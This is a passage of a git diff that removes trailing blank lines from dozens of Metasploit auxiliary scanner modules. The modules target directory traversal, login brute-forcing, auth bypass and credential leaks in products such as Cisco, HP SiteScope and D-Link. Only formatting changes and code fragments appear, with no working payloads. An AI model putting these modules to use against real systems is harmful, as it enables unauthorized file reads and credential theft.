a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index 21e2dab766..a972becc3b 100644 --- a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb @@ -121,5 +121,4 @@ class MetasploitModule < Msf::Auxiliary percent = "%3.2f%%" % done.to_f print_status("Obtaining file contents - %7s done (%d/%d bytes)" % [percent, current, total]) end - end diff --git a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb index c8533bf0bd..20a6987663 100644 --- a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb @@ -92,5 +92,4 @@ class MetasploitModule < Msf::Auxiliary vprint_error("Fail to obtain file for some unknown reason") end end - end diff --git a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb index 627d8147b0..3489465a1e 100644 --- a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb +++ b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Auxiliary ) end end - end diff --git a/modules/auxiliary/scanner/http/advantech_webaccess_login.rb b/modules/auxiliary/scanner/http/advantech_webaccess_login.rb index 4564dfd7ec..657e16e514 100644 --- a/modules/auxiliary/scanner/http/advantech_webaccess_login.rb +++ b/modules/auxiliary/scanner/http/advantech_webaccess_login.rb @@ -134,5 +134,4 @@ class MetasploitModule < Msf::Auxiliary bruteforce(ip) end - end diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb index 0c317f6341..a973081030 100644 --- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb +++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb @@ -129,5 +129,4 @@ class MetasploitModule < Msf::Auxiliary def marker @marker ||= Rex::Text.rand_text_alphanumeric(rand(42) + 1) end - end diff --git a/modules/auxiliary/scanner/http/apache_userdir_enum.rb b/modules/auxiliary/scanner/http/apache_userdir_enum.rb index 13665ee007..c480469c87 100644 --- a/modules/auxiliary/scanner/http/apache_userdir_enum.rb +++ b/modules/auxiliary/scanner/http/apache_userdir_enum.rb @@ -92,5 +92,4 @@ class MetasploitModule < Msf::Auxiliary rescue ::Timeout::Error, ::Errno::EPIPE end end - end diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb index 25dbd7ec4a..3cdd6c1406 100644 --- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb +++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb @@ -139,6 +139,5 @@ class MetasploitModule < Msf::Auxiliary print_error("#{rhost}#{rport} Failed to retrieve file from #{rhost}:#{rport}") end - end diff --git a/modules/auxiliary/scanner/http/backup_file.rb b/modules/auxiliary/scanner/http/backup_file.rb index 803068dc40..46703fd7e9 100644 --- a/modules/auxiliary/scanner/http/backup_file.rb +++ b/modules/auxiliary/scanner/http/backup_file.rb @@ -88,5 +88,4 @@ class MetasploitModule < Msf::Auxiliary end - end diff --git a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb index acc8772b3c..1e581da804 100644 --- a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb @@ -85,5 +85,4 @@ class MetasploitModule < Msf::Auxiliary rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end - end diff --git a/modules/auxiliary/scanner/http/bavision_cam_login.rb b/modules/auxiliary/scanner/http/bavision_cam_login.rb index 2c2fbea651..08c2368ef1 100644 --- a/modules/auxiliary/scanner/http/bavision_cam_login.rb +++ b/modules/auxiliary/scanner/http/bavision_cam_login.rb @@ -131,5 +131,4 @@ class MetasploitModule < Msf::Auxiliary bruteforce(ip) end - end diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index 9234e0f52b..0e29a98fcc 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb @@ -89,7 +89,6 @@ class MetasploitModule < Msf::Auxiliary print_error("Request failed due to some unknown reason") end end - end =begin diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index 7834ad9be8..0cc7f39aba 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -469,5 +469,4 @@ class MetasploitModule < Msf::Auxiliary return false end - end diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb index 4497bfd08d..8ee7afb04c 100644 --- a/modules/auxiliary/scanner/http/cert.rb +++ b/modules/auxiliary/scanner/http/cert.rb @@ -109,5 +109,4 @@ class MetasploitModule < Msf::Auxiliary return if(e.to_s =~ /execution expired/) print_error("Error: '#{ip}' '#{e.class}' '#{e}' '#{e.backtrace}'") end - end diff --git a/modules/auxiliary/scanner/http/chef_webui_login.rb b/modules/auxiliary/scanner/http/chef_webui_login.rb index 6e2797c382..6597b40543 100644 --- a/modules/auxiliary/scanner/http/chef_webui_login.rb +++ b/modules/auxiliary/scanner/http/chef_webui_login.rb @@ -155,5 +155,4 @@ class MetasploitModule < Msf::Auxiliary ) ) end - end diff --git a/modules/auxiliary/scanner/http/chromecast_webserver.rb b/modules/auxiliary/scanner/http/chromecast_webserver.rb index 1dbec0520b..c0b316b68f 100644 --- a/modules/auxiliary/scanner/http/chromecast_webserver.rb +++ b/modules/auxiliary/scanner/http/chromecast_webserver.rb @@ -56,5 +56,4 @@ class MetasploitModule < Msf::Auxiliary ) end end - end diff --git a/modules/auxiliary/scanner/http/chromecast_wifi.rb b/modules/auxiliary/scanner/http/chromecast_wifi.rb index 08602f7056..6544e9f186 100644 --- a/modules/auxiliary/scanner/http/chromecast_wifi.rb +++ b/modules/auxiliary/scanner/http/chromecast_wifi.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Auxiliary '' end end - end diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index 33fb610321..c9fd5e35e0 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -88,5 +88,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/http/cisco_firepower_download.rb b/modules/auxiliary/scanner/http/cisco_firepower_download.rb index 745ef23d62..344c181554 100644 --- a/modules/auxiliary/scanner/http/cisco_firepower_download.rb +++ b/modules/auxiliary/scanner/http/cisco_firepower_download.rb @@ -161,5 +161,4 @@ class MetasploitModule < Msf::Auxiliary print_error("Remote file not found: #{datastore['FILEPATH']}") end end - end diff --git a/modules/auxiliary/scanner/http/cisco_firepower_login.rb b/modules/auxiliary/scanner/http/cisco_firepower_login.rb index 0c3d564ddf..19a3e45f59 100644 --- a/modules/auxiliary/scanner/http/cisco_firepower_login.rb +++ b/modules/auxiliary/scanner/http/cisco_firepower_login.rb @@ -137,5 +137,4 @@ class MetasploitModule < Msf::Auxiliary bruteforce(ip) end - end diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb index 75b7c99736..72038f7cb7 100644 --- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb @@ -87,5 +87,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb index 7d5b143c10..747d3c883b 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb @@ -272,5 +272,4 @@ class MetasploitModule < Msf::Auxiliary login_data.merge!(service_data) create_credential_login(login_data) end - end diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index 9bbba6d6d8..3cac9d44c5 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -81,5 +81,4 @@ class MetasploitModule < Msf::Auxiliary print_error("Fail to obtain file for some unknown reason") end end - end diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index 90c0692f1b..4b0f5e052e 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -191,7 +191,6 @@ class MetasploitModule < Msf::Auxiliary rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError rescue ::Timeout::Error, ::Errno::EPIPE end - end # URLs that may work for you: diff --git a/modules/auxiliary/scanner/http/coldfusion_version.rb b/modules/auxiliary/scanner/http/coldfusion_version.rb index a5f9e040d6..ce0e714379 100644 --- a/modules/auxiliary/scanner/http/coldfusion_version.rb +++ b/modules/auxiliary/scanner/http/coldfusion_version.rb @@ -120,5 +120,4 @@ class MetasploitModule < Msf::Auxiliary rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError rescue ::Timeout::Error, ::Errno::EPIPE end - end diff --git a/modules/auxiliary/scanner/http/dell_idrac.rb b/modules/auxiliary/scanner/http/dell_idrac.rb index d6643c36e9..a3a22a6edc 100644 --- a/modules/auxiliary/scanner/http/dell_idrac.rb +++ b/modules/auxiliary/scanner/http/dell_idrac.rb @@ -136,5 +136,4 @@ class MetasploitModule < Msf::Auxiliary return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted end end - end diff --git a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb index 238797cf27..89dfd454e8 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb @@ -153,5 +153,4 @@ class MetasploitModule < Msf::Auxiliary end return :fail end - end diff --git a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb index f5c0b8fad5..b5820c1c86 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb @@ -169,5 +169,4 @@ class MetasploitModule < Msf::Auxiliary end return :fail end - end diff --git a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb index 10d1e331f2..12b545e0bf 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb @@ -159,5 +159,4 @@ class MetasploitModule < Msf::Auxiliary end return :fail end - end diff --git a/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb b/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb index fc5e368ff2..8c575d7f3a 100644 --- a/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb +++ b/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb @@ -72,7 +72,6 @@ class MetasploitModule < Msf::Auxiliary p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file)) print_good("File saved as: #{p}") end - end diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb index 89322bde69..a8c57236b8 100644 --- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb +++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb @@ -146,5 +146,4 @@ class MetasploitModule < Msf::Auxiliary ) print_status("Usernames stored in: #{p}") end - end diff --git a/modules/auxiliary/scanner/http/ektron_cms400net.rb b/modules/auxiliary/scanner/http/ektron_cms400net.rb index e505586d81..15954f3f4b 100644 --- a/modules/auxiliary/scanner/http/ektron_cms400net.rb +++ b/modules/auxiliary/scanner/http/ektron_cms400net.rb @@ -182,5 +182,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index a8f47c302b..6644b78f1a 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -143,5 +143,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index 04faec5783..6408a0f598 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -188,5 +188,4 @@ class MetasploitModule < Msf::Auxiliary bruteforce(ip) unless @scanner.version.blank? end - end diff --git a/modules/auxiliary/scanner/http/host_header_injection.rb b/modules/auxiliary/scanner/http/host_header_injection.rb index dd77859eb0..69461a767d 100644 --- a/modules/auxiliary/scanner/http/host_header_injection.rb +++ b/modules/auxiliary/scanner/http/host_header_injection.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Auxiliary rescue ::Timeout::Error, ::Errno::EPIPE end end - end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb index 7fee6603e1..f3bee086eb 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb @@ -177,6 +177,5 @@ class MetasploitModule < Msf::Auxiliary print_error("Failed to retrieve the file contents") end - end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index 092ac47aa6..13f5836bbe 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -128,6 +128,5 @@ class MetasploitModule < Msf::Auxiliary print_error("Failed to retrieve the SiteScope Configuration") end - end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb index ccd71769f2..1263135c79 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb @@ -112,6 +112,5 @@ class MetasploitModule < Msf::Auxiliary print_error("Failed to retrieve the file") end - end diff --git a/modules/auxiliary/scanner/http/http_header.rb b/modules/auxiliary/scanner/http/http_header.rb index b88dfd792e..e2dd208aae 100644 --- a/modules/auxiliary/scanner/http/http_header.rb +++ b/modules/auxiliary/scanner/http/http_header.rb @@ -87,5 +87,4 @@ class MetasploitModule < Msf::Auxiliary print_good "#{peer}: detected #{counter} headers" end end - end diff --git a/modules/auxiliary/scanner/http/http_hsts.rb b/modules/auxiliary/scanner/http/http_hsts.rb index 727a74fec2..2e7415388a 100644 --- a/modules/auxiliary/scanner/http/http_hsts.rb +++ b/modules/auxiliary/scanner/http/http_hsts.rb @@ -51,5 +51,4 @@ class MetasploitModule < Msf::Auxiliary rescue ::Timeout::Error, ::Errno::EPIPE end end - end diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb index 4d4b539486..d7f413d4db 100644 --- a/modules/auxiliary/scanner/http/http_put.rb +++ b/modules/auxiliary/scanner/http/http_put.rb @@ -185,5 +185,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/http/http_version.rb b/modules/auxiliary/scanner/http/http_version.rb index 0929c752ea..0259f62e88 100644 --- a/modules/auxiliary/scanner/http/http_version.rb +++ b/modules/auxiliary/scanner/http/http_version.rb @@ -40,5 +40,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end end - end diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb index e9c1b5ec20..7de02638a2 100644 --- a/modules/auxiliary/scanner/http/infovista_enum.rb +++ b/modules/auxiliary/scanner/http/infovista_enum.rb @@ -134,5 +134,4 @@ class MetasploitModule < Msf::Auxiliary return :abort end end - end diff --git a/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb b/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb index 747bd07265..240e539fd8 100644 --- a/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb +++ b/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb @@ -113,5 +113,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end end - end diff --git a/modules/auxiliary/scanner/http/ipboard_login.rb b/modules/auxiliary/scanner/http/ipboard_login.rb index ed2a68431a..b469494b49 100644 --- a/modules/auxiliary/scanner/http/ipboard_login.rb +++ b/modules/auxiliary/scanner/http/ipboard_login.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb index bbd87a5326..c9fa42e5cc 100644 --- a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb +++ b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb @@ -289,5 +289,4 @@ class MetasploitModule < Msf::Auxiliary valor_input_id end - end diff --git a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb index 69073a6b62..3b30ead6ca 100644 --- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb index ad7c18d9fe..7816de7d98 100644 --- a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb @@ -101,5 +101,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb index 0c020e2172..38b3ee830e 100644 --- a/modules/auxiliary/scanner/http/joomla_pages.rb +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Auxiliary vprint_error("Timeout error") return end - end diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb index 4c9d8ac97a..90d8ed5f48 100644 --- a/modules/auxiliary/scanner/http/joomla_plugins.rb +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb @@ -163,5 +163,4 @@ class MetasploitModule < Msf::Auxiliary vprint_error("Timeout error") return end - end diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb index 32c339f661..23591db348 100644 --- a/modules/auxiliary/scanner/http/joomla_version.rb +++ b/modules/auxiliary/scanner/http/joomla_version.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Auxiliary print_error("Unable to find Joomla version.") end end - end diff --git a/modules/auxiliary/scanner/http/kodi_traversal.rb b/modules/auxiliary/scanner/http/kodi_traversal.rb index d3adb3ca2e..2e1c1a882d 100644 --- a/modules/auxiliary/scanner/http/kodi_traversal.rb +++ b/modules/auxiliary/scanner/http/kodi_traversal.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Auxiliary print_error('Fail to obtain file for some unknown reason') end end - end diff --git a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb index dfca196b80..e0117c859f 100644 --- a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb @@ -93,5 +93,4 @@ class MetasploitModule < Msf::Auxiliary rescue ::Timeout::Error, ::Errno::EPIPE end end - end diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 9d8985afe8..24d64b9d76 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -88,5 +88,4 @@ EOF print_status("Request sent.") end - end diff --git a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb index c732a88614..f1b448f94a 100644 --- a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb @@ -98,5 +98,4 @@ class MetasploitModule < Msf::Auxiliary rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end - end diff --git a/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb b/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb index 4f4be8bcc0..092cfd3881 100644 --- a/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb +++ b/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb @@ -129,5 +129,4 @@ class MetasploitModule < Msf::Auxiliary bruteforce(ip) end - end diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb index e409a345a8..61b89876bc 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Auxiliary print_status("#{ip}:#{rport} - File saved in: #{path}") end end - end diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb index b395cbf79a..df5eccdeaf 100644 --- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Auxiliary print_error("Fail to obtain file for some unknown reason") end end - end diff --git a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb index f9e16f9846..df5b17000d 100644 --- a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb +++ b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb @@ -278,5 +278,4 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) accessfile(ip) end - end diff --git a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb index 6ef02bc239..bd4fc44385 100644 --- a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb @@ -102,5 +102,4 @@ class MetasploitModule < Msf::Auxiliary rescue ::Timeout::Error, ::Errno::EPIPE end end - end diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb index 04efa0cfa8..b16d4a0ce0 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb @@ -68,6 +68,5 @@ class MetasploitModule < Msf::Auxiliary print_error("Failed to retrieve the file contents") end end - end diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb index ed0d598100..39222cc311 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb @@ -68,6 +68,5 @@ class MetasploitModule < Msf::Auxiliary print_error("Failed to retrieve the file contents") end end - end diff --git a/modules/auxiliary/scanner/http/novell_mdm_creds.rb b/modules/auxiliary/scanner/http/novell_mdm_creds.rb index 4ec01aed16..97e2cd5f47 100644 --- a/modules/auxiliary/scanner/http/novell_mdm_creds.rb +++ b/modules/auxiliary/scanner/http/novell_mdm_creds.rb @@ -132,5 +132,4 @@ class MetasploitModule < Msf::Auxiliary return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted end end - end diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 1eb0779b23..22ec3a42c9 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb @@ -134,5 +134,4 @@ class MetasploitModule < Msf::Auxiliary :new_offset => offset + size } end - end diff --git a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb index 91199dfefb..a5de1116b4 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Auxiliary print_good("Credentials decoded: #{creds}") unless creds.empty? end end - end diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index bd4330172c..6059e718f8 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb @@ -406,5 +406,4 @@ class MetasploitModule < Msf::Auxiliary def msg "#{vhost}:#{rport} OWA -" end - end diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb index 7770d7f7bf..173bc29684 100644 --- a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb @@ -92,5 +92,4 @@ class MetasploitModule < Msf::Auxiliary vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or TARGETURI & HTTP_METHOD must be set") end end - end diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index 75f2b257bd..71dc3f7331 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -87,5 +87,4 @@ class MetasploitModule < Msf::Auxiliary vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH & HTTP_METHOD must be set") end end - end diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index 5e92862e2a..95ae881adb 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -175,5 +175,4 @@ class MetasploitModule < Msf::Auxiliary } end - end diff --git a/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb b/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb index 46fb607b27..49af26f702 100644 --- a/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb +++ b/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb @@ -125,5 +125,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb index 4af8a3fa8c..63c6fa44c9 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb @@ -98,5 +98,4 @@ class MetasploitModule < Msf::Auxiliary print_good("Password data from #{uri} stored to #{path}") end end - end diff --git a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb index 05c28a2b4d..830171affb 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb @@ -152,5 +152,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb 